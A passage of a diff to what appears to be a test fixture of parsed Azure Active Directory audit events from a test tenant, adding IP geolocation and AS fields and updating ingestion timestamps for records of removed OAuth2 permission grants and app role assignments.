"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7284,6 +7740,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7450,7 +7918,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125054Z", + "ingested": "2021-12-14T14:48:43.176662606Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7477,6 +7945,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7643,7 +8123,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125060300Z", + "ingested": "2021-12-14T14:48:43.176663346Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908041\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7bca6665-4d58-4df9-bd34-4d92e1fc63aa\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7670,6 +8150,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -7836,7 +8328,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125066900Z", + "ingested": "2021-12-14T14:48:43.176663984Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -7863,6 +8355,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -8029,7 +8533,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125073500Z", + "ingested": "2021-12-14T14:48:43.176664659Z", "original": 